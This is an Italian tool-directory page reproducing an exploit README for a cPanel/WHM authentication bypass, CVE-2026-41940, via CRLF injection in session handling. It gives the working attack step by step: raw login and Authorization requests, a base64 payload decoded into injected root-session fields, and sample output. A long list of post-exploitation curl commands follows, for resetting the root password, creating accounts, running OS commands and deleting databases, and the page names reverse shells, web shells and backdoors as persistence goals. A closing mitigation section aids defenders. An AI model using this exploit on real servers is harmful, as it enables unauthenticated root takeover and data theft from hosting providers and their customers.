Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
cPanel-WHM-CVE-2026-41940-auth-bypass-exploit — Exploit critico di bypass dell'autenticazione per cPanel/WHM CVE-2026-41940. Sfrutta l'iniezione CRLF nel demone cpsrvd per ottenere accesso root a WHM senza credenziali. Include rilevamento della versione, logging dettagliato, supporto proxy, reporting JSON ed enumerazione degli account post-exploitation. Solo per test di sicurezza autorizzati. | Kitploit
Strumenti/GitHubGitHub/cerberusmrxi/cpanel-whm-cve-2026-41940-auth-bypass-exploit
Autenticazione e AutorizzazioneAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebRaccolta InformazioniPenetration Testing
GitHubcerberusmrxi/cpanel-whm-cve-2026-41940-auth-bypass-exploit

cPanel-WHM-CVE-2026-41940-auth-bypass-exploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →

Informazioni

Vedi Repository
225 giorni faNon ancora revisionato

Exploit critico di bypass dell'autenticazione per cPanel/WHM CVE-2026-41940. Sfrutta l'iniezione CRLF nel demone cpsrvd per ottenere accesso root a WHM senza credenziali. Include rilevamento della versione, logging dettagliato, supporto proxy, reporting JSON ed enumerazione degli account post-exploitation. Solo per test di sicurezza autorizzati.

Condividi

CVE-2026-41940 - Exploit di Bypass dell'Autenticazione di cPanel & WHM

PythonLicenseCVECVSSStatus

Bypass critico dell'autenticazione tramite iniezione CRLF nel daemon cpsrvd di cPanel/WHM


📋 Panoramica

CVE-2026-41940 è una vulnerabilità critica di bypass dell'autenticazione in cPanel & WHM che consente ad attaccanti remoti non autenticati di ottenere accesso amministrativo di livello root al server. La vulnerabilità risiede nella gestione delle sessioni del daemon cpsrvd, in particolare in Cpanel/Session.pm, dove la neutralizzazione impropria dei delimitatori di riga (CRLF) nel cookie whostmgrsession e negli header Authorization consente l'iniezione di parametri di sessione.

Punteggio CVSSTipo di ExploitImpattoVettore di Attacco
9.8Bypass dell'AutenticazioneAccesso RootRete
c

⚡ Caratteristiche Principali

Questo strumento di exploit offre le seguenti caratteristiche principali:

  • 🔓 Bypass dell'Autenticazione - Ottieni accesso root a WHM senza credenziali

  • 🛡️ Tecniche di Bypass Multiple - Prova automaticamente diversi metodi di verifica

  • 🌐 Supporto Proxy - Instrada il traffico attraverso proxy HTTP/HTTPS

  • 📊 Report JSON - Genera report di valutazione dettagliati

  • 📝 Registrazione Completa - Modalità di debug estesa con timestamp

  • 🔍 Rilevamento Versione - Rileva e verifica automaticamente le versioni vulnerabili

  • 👥 Enumerazione Account - Elenca tutti gli account cPanel post-exploit

  • 🎯 Endpoint Multipli - Tenta vari endpoint API per la verifica


🚨 Dettagli della Vulnerabilità

🔬 Analisi Tecnica

La vulnerabilità deriva da due problemi principali:

  1. Iniezione CRLF nello Storage delle Sessioni - La funzione saveSession non sanifica i caratteri di nuova riga (\n) nel campo pass prima di scrivere nel file di sessione, consentendo l'iniezione di parametri di sessione arbitrari.

  2. Bypass Condizionale della Codifica - Quando il cookie di sessione non contiene la parte ob (il segmento dopo la virgola), il valore di pass viene scritto non codificato (in chiaro), abilitando l'iniezione di sequenze CRLF.

🎯 Versioni Interessate


📦 Installazione

Prerequisiti

root@kitploit:~
# Python 3.6 or higher required
python3 --version

# Install required packages
pip install -r requirements.txt

File dei Requisiti

root@kitploit:~
requests>=2.28.0
urllib3>=1.26.0

Clonazione del Repository

root@kitploit:~
git clone https://github.com/CerberusMrXi/cPanel-WHM-CVE-2026-41940-auth-bypass-exploit.git
cd cPanel-WHM-CVE-2026-41940-auth-bypass-exploit

🚀 Utilizzo

Utilizzo di Base

root@kitploit:~
python3 exploit.py --target https://target.com:2087

Utilizzo Avanzato

root@kitploit:~
# Verbose mode with debug output
python3 exploit.py --target https://target.com:2087 --verbose

# Through proxy
python3 exploit.py --target https://target.com:2087 --proxy http://127.0.0.1:8080

# Save report and list accounts
python3 exploit.py --target https://target.com:2087 --output report.json --list-accounts

# Custom timeout
python3 exploit.py --target https://target.com:2087 --timeout 30

Esempio di Output

root@kitploit:~
=======================================================
 CVE-2026-41940 - cPanel/WHM Authentication Bypass
 Critical CRLF Injection in cpsrvd (CVSS: 9.8 )
 Exploit Version: 1.0
=======================================================
 Target      : https://target.com:2087
 Started     : 2026-07-26 22:23:18
=======================================================
2026-07-26 22:23:18 [INFO] Detecting cPanel/WHM version...
2026-07-26 22:23:19 [INFO] Version: 11.110.0.85 - Vulnerable
2026-07-26 22:23:19 [INFO] Attempting to mint pre-authentication session...
2026-07-26 22:23:20 [INFO] Pre-authentication session obtained successfully
2026-07-26 22:23:20 [INFO] Injecting CRLF payload via Authorization header...
2026-07-26 22:23:21 [INFO] Token leaked: /cpsess1234567890
2026-07-26 22:23:21 [INFO] Verifying root access with multiple bypass techniques...
2026-07-26 22:23:25 [INFO] Access verified with URL format: /cpsess-{token}

=======================================================
 EXPLOIT SUCCESSFUL
=======================================================
 Target              : https://target.com:2087
 Token               : /cpsess1234567890
 Admin URL           : https://target.com:2087/cpsess1234567890/
 Version             : 11.110.0.85
 Verification Method : url_format
 Completed           : 2026-07-26 22:23:25
=======================================================

[!] Access WHM with the token above
[!] Use the token in all subsequent requests
[!] Example: curl -k "https://target.com:2087/cpsess1234567890/json-api/version?api.version=1"
=======================================================

🔧 Argomenti della Riga di Comando


🔬 Metodologia dell'Exploit

Fase 1: Ottenere una Sessione Pre-Autenticazione

L'exploit ottiene prima un cookie di sessione pre-autenticazione tentando un accesso fallito:

root@kitploit:~
POST /login/?login_only=1 HTTP/1.1
Host: target.com:2087
Content-Type: application/x-www-form-urlencoded

user=root&pass=wrong_pass

Risposta:

root@kitploit:~
Set-Cookie: whostmgrsession=base64_encoded_data

Fase 2: Iniezione CRLF

L'header Authorization appositamente costruito inietta parametri di sessione dannosi:

root@kitploit:~
GET / HTTP/1.1
Host: target.com:2087
Authorization: Basic cm9vdDp4DQpzdWNjZXNzZnVsX2ludGVybmFsX2F1dGhfd2l0aF90aW1lc3RhbXA9OTk5OTk5OTk5OQ0KdXNlcj1yb290DQp0ZmFfdmVyaWZpZWQ9MQ0KaGFzcm9vdD0x
Cookie: whostmgrsession=[SESSION_BASE]

Payload Decodificato:

root@kitploit:~
root:x
successful_internal_auth_with_timestamp=9999999999
user=root
tfa_verified=1
hasroot=1

Fase 3: Estrazione del Token

Il server risponde con un reindirizzamento contenente il token di sessione amministrativo:

root@kitploit:~
Location: /cpsess1234567890/

Fase 4: Verifica dell'Accesso

L'exploit tenta diversi metodi di verifica per confermare l'accesso root.


🎯 Comandi Post-Exploitation

Una volta che l'exploit ha avuto successo, utilizza i seguenti comandi con il token ottenuto:

Informazioni sul Server

root@kitploit:~
# Get server version
curl -k "https://target.com:2087/cpsess-1234567890/json-api/version?api.version=1"

# Get server information
curl -k "https://target.com:2087/cpsess-1234567890/json-api/server_info?api.version=1"

# Get hostname
curl -k "https://target.com:2087/cpsess-1234567890/json-api/get_hostname?api.version=1"

# Get load average
curl -k "https://target.com:2087/cpsess-1234567890/json-api/loadavg?api.version=1"

# Get CPU usage
curl -k "https://target.com:2087/cpsess-1234567890/json-api/get_cpu_usage?api.version=1"

# Get memory usage
curl -k "https://target.com:2087/cpsess-1234567890/json-api/get_memory_usage?api.version=1"

# Get disk usage
curl -k "https://target.com:2087/cpsess-1234567890/json-api/get_disk_usage?api.version=1"

# Server time
curl -k "https://target.com:2087/cpsess-1234567890/json-api/server_time?api.version=1"

# Service status
curl -k "https://target.com:2087/cpsess-1234567890/json-api/service_status?api.version=1"

Gestione Account

root@kitploit:~
# List all cPanel accounts
curl -k "https://target.com:2087/cpsess-1234567890/json-api/listaccts?api.version=1"

# List accounts with details
curl -k "https://target.com:2087/cpsess-1234567890/json-api/account_list?api.version=1"

# Account summary
curl -k "https://target.com:2087/cpsess-1234567890/json-api/account_summary?api.version=1"

# Domain information
curl -k "https://target.com:2087/cpsess-1234567890/json-api/domain_info?api.version=1"

# Email statistics
curl -k "https://target.com:2087/cpsess-1234567890/json-api/email_stats?api.version=1"

# PHP configuration
curl -k "https://target.com:2087/cpsess-1234567890/json-api/php_ini?api.version=1"

Script WHM

root@kitploit:~
# Server status
curl -k "https://target.com:2087/cpsess-1234567890/scripts2/serverstatus"

# System information
curl -k "https://target.com:2087/cpsess-1234567890/scripts2/sysinfo"

# List accounts (alternative )
curl -k "https://target.com:2087/cpsess-1234567890/scripts2/listaccts"

# Show processes
curl -k "https://target.com:2087/cpsess-1234567890/scripts2/showprocs"

# Disk usage
curl -k "https://target.com:2087/cpsess-1234567890/scripts2/diskusage"

Azioni Amministrative

root@kitploit:~
# Change user password
curl -k -X POST "https://target.com:2087/cpsess-1234567890/json-api/passwd" \
  -d "user=root&pass=NewP@ss123"

# Create new account
curl -k -X POST "https://target.com:2087/cpsess-1234567890/json-api/createacct" \
  -d "username=testuser&domain=test.com&password=TestPass123&plan=default"

# Execute OS commands
curl -k -X POST "https://target.com:2087/cpsess-1234567890/scripts/run_script" \
  -d "script=id"

# Suspend account
curl -k -X POST "https://target.com:2087/cpsess-1234567890/json-api/suspendacct" \
  -d "user=testuser"

# Unsuspend account
curl -k -X POST "https://target.com:2087/cpsess-1234567890/json-api/unsuspendacct" \
  -d "user=testuser"

# Remove account
curl -k -X POST "https://target.com:2087/cpsess-1234567890/json-api/removeacct" \
  -d "user=testuser"

Informazioni di Sicurezza

root@kitploit:~
# Get security advisor info
curl -k "https://target.com:2087/cpsess-1234567890/json-api/security_advisor?api.version=1"

# Get SSH key info
curl -k "https://target.com:2087/cpsess-1234567890/json-api/get_ssh_keys?api.version=1"

# Check firewall status
curl -k "https://target.com:2087/cpsess-1234567890/json-api/firewall_status?api.version=1"

# Get SSL certificates
curl -k "https://target.com:2087/cpsess-1234567890/json-api/ssl_certificates?api.version=1"

Operazioni sul Database

root@kitploit:~
# List MySQL databases
curl -k "https://target.com:2087/cpsess-1234567890/json-api/databases?api.version=1"

# Create database
curl -k -X POST "https://target.com:2087/cpsess-1234567890/json-api/create_db" \
  -d "db=test_db"

# Delete database
curl -k -X POST "https://target.com:2087/cpsess-1234567890/json-api/delete_db" \
  -d "db=test_db"

# List database users
curl -k "https://target.com:2087/cpsess-1234567890/json-api/db_users?api.version=1"

🛡️ Capacità Post-Exploitation

Una volta ottenuto l'accesso root a WHM, un attaccante può:

Gestione Account

  • 🔍 Elencare tutti gli account cPanel

  • 👤 Creare nuovi account cPanel

  • 🔑 Modificare le password degli account

  • ❌ Eliminare o sospendere account

Controllo del Server

  • 🖥️ Eseguire comandi di sistema operativo

  • 🔄 Cambiare la password di root

  • 📊 Visualizzare le statistiche del server

  • 🗄️ Gestire i database MySQL

Persistenza

  • 🐚 Distribuire reverse shell

  • 🌐 Installare web shell

  • 🗝️ Installare backdoor

  • 🔒 Creare account amministrativi nascosti

Accesso ai Dati

  • 📁 Accedere a tutti i file del server

  • 💾 Esportare i database

  • 📧 Leggere gli account email

  • 🔐 Accedere ai certificati SSL


🚨 Mitigazione di Emergenza

Azioni Immediate

root@kitploit:~
# 1. Update cPanel/WHM immediately
/scripts/upcp --force

# 2. Invalidate all active sessions
rm -rf /var/cpanel/sessions/raw/*
rm -rf /var/cpanel/sessions/cache/*
systemctl restart cpanel

# 3. Restrict WHM access to trusted IPs
# Add to /etc/csf/csf.conf
# Or configure firewall

# 4. Enable Multi-Factor Authentication (MFA )
# WHM > Security Center > Two-Factor Authentication

# 5. Change ALL passwords
# - Root password
# - All cPanel user passwords
# - Database passwords
# - FTP passwords

# 6. Audit system for backdoors
find / -type f -mtime -7 -name "*.php" -o -name "*.pl" -o -name "*.cgi"

# 7. Check for malicious cron jobs
crontab -l
for user in $(cut -f1 -d: /etc/passwd); do crontab -u $user -l; done

# 8. Check SSH authorized keys
for user in $(cut -f1 -d: /etc/passwd); do
  echo "=== $user ==="
  cat /home/$user/.ssh/authorized_keys 2>/dev/null
done

Prevenzione a Lungo Termine

  • ✅ Implementare una validazione rigorosa degli input per prevenire l'iniezione CRLF

  • ✅ Distribuire regole WAF per rilevare e bloccare richieste dannose

  • ✅ Abilitare restrizioni di accesso basate su IP per WHM

  • ✅ Aggiornare regolarmente cPanel/WHM alle versioni più recenti

  • ✅ Condurre valutazioni di sicurezza regolari

  • ✅ Monitorare i log per attività sospette

  • ✅ Implementare il principio del privilegio minimo

  • ✅ Abilitare Security Advisor in WHM

  • ✅ Eseguire audit di sicurezza regolari

  • ✅ Implementare un sistema di rilevamento delle intrusioni


📊 Report di Esempio

root@kitploit:~
{
  "timestamp": "2026-07-26T22:23:25.123456",
  "target": "https://target.com:2087",
  "status": "success",
  "token": "1234567890",
  "detected_version": "11.110.0.85",
  "vulnerable": true,
  "verification_method": "url_format",
  "notes": "Root access confirmed; Token verified",
  "exploit_name": "CVE-2026-41940",
  "cvss_score": "9.8",
  "description": "cPanel/WHM Authentication Bypass via CRLF Injection",
  "exploit_version": "1.0"
}

⚠️ Disclaimer Legale

Questo strumento è fornito esclusivamente a scopo educativo e di ricerca sulla sicurezza etica. L'autore e i collaboratori non sono responsabili di qualsiasi uso improprio o danno causato da questo software. Utilizzando questo strumento, accetti di assumerti ogni responsabilità per le tue azioni. Assicurati di avere un'autorizzazione esplicita prima di testare qualsiasi sistema.


🤝 Contributi

Accogliamo con piacere i contributi! Segui questi passaggi:

  1. 🍴 Fai il fork del repository

  2. 🔧 Crea il tuo branch per la funzionalità (git checkout -b feature/amazing-feature )

  3. 💾 Esegui il commit delle tue modifiche (git commit -m 'Add amazing feature')

  4. 📤 Esegui il push sul branch (git push origin feature/amazing-feature)

  5. 🔃 Apri una Pull Request


📝 Registro delle Modifiche

v1.0.0 (2026-07-26)

  • 🎉 Rilascio iniziale

  • 🔓 Implementazione dell'exploit con iniezione CRLF

  • 🛡️ Tecniche multiple di bypass della verifica

  • 📊 Generazione di report JSON

  • 🌐 Supporto proxy

  • 📝 Registrazione completa

  • 🔍 Rilevamento della versione

  • 👥 Enumerazione degli account

  • 📚 Comandi post-exploitation completi


📧 Contatti

  • Avviso di Sicurezza - [email protected]

  • Problemi su GitHub - Apri un problema


📚 Riferimenti

  1. Dettaglio CVE-2026-41940

  2. Avviso di Sicurezza cPanel

  3. Ricerca watchTowr

  4. Cheat Sheet Iniezione CRLF

  5. Documentazione API WHM


⚠️ RICORDA: Da grandi poteri derivano grandi responsabilità! Usa eticamente! ⚠️

Realizzato con ❤️ per la community della sicurezza

Scarica lo strumento
AttributoValore
ID CVECVE-2026-41940
Punteggio CVSS9.8 (Critico)
Tipo di VulnerabilitàBypass dell'Autenticazione tramite Iniezione CRLF
Componente Interessatodaemon cpsrvd (Cpanel/Session.pm)
Vettore di AttaccoRete
ImpattoAccesso Root Completo
SfruttamentoRemoto Non Autenticato
Canale di RilascioVulnerabile Fino aVersione Corretta
11.110.x11.110.0.9611.110.0.97
11.118.x11.118.0.6211.118.0.63
11.126.x11.126.0.5311.126.0.54
11.132.x11.132.0.2811.132.0.29
11.134.x11.134.0.1911.134.0.20
11.136.x11.136.0.411.136.0.5
ArgomentoBreveRichiestoDescrizione
--target-t✅URL del target (es. https://target.com:2087 )
--verbose-v❌Abilita output verboso/di debug
--proxy-p❌URL del proxy (es. http://127.0.0.1:8080 )
--output-o❌File di output per il report JSON
--timeout❌Timeout della richiesta in secondi (predefinito: 10)
--list-accounts-l❌Elenca gli account cPanel dopo un exploit riuscito
--version❌Mostra la versione dell'exploit